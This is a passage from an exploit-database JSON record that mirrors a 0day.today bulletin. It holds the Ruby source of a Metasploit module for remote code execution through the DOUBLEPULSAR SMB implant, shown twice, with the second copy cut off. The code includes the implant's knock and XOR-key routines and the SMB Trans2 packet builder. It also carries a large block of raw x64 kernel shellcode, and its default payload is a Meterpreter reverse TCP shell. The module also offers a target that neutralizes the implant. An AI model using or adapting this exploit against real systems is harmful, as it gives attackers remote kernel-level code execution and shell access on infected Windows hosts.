implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-24] #"}, "lastseen": "2021-10-23T22:13:27", "differentElements": ["sourceData"], "edition": 53}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "bca16d35f701200b292213bc972d72e9", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-25T00:15:24", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-25T00:15:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-25T00:15:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = 